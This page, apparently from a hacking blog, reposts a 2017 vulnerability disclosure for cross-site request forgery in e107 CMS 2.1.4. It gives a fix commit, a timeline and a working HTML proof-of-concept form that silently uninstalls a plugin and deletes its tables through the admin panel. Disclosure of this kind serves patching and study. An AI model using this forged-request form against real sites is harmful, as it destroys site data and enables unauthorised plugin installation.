Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86387146

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

<!--
==========================
Title:Mutiple CSRF vulnerabilities in e107 CMS 2.1.4
Author:Zhiyang Zeng

Product:
—————
e107 is a powerful website content management system designed for bootstrap v3 from http://e107.org/get-started
—————

Fix
—————
Fixed in git source code https://github.com/e107inc/e107/commit/7a3e3d9fc7e05ce6941b9af1c14010bf2141f1a5
—————

Summary
————
e107 CMS version 2.1.4 is vulnerable to cross-site request forgery in plugin-installing,meta-changingand settings-changing,a malicious web page can use
forged requests to make e107 download and install a plug-in provided by the attacker.
————

Timeline
———
2017-03-01   report to vendor
2017-03-02  GitHub commit to fix token missing
———

 Reproduce:
==========
I just give a uninstall any plugins POC.

vul address:http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php

POC:
-->

<form action="http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php?uninstall.8" method="post">
<input type="text" name="delete_tables" value="1">
<input type="text" name="delete_ipool" value="1">
<input type="text" name="delete_files" value="0">
<input type="text" name="uninstall_confirm" value="Confirm uninstall">
<input type="submit" name="submit">
</form>

<!--
Description:
I try to uninstall plugin  gallery which id is 8.

visiting beyond POC page, you will find gallery plugin has been uninstalled success!
===========
-->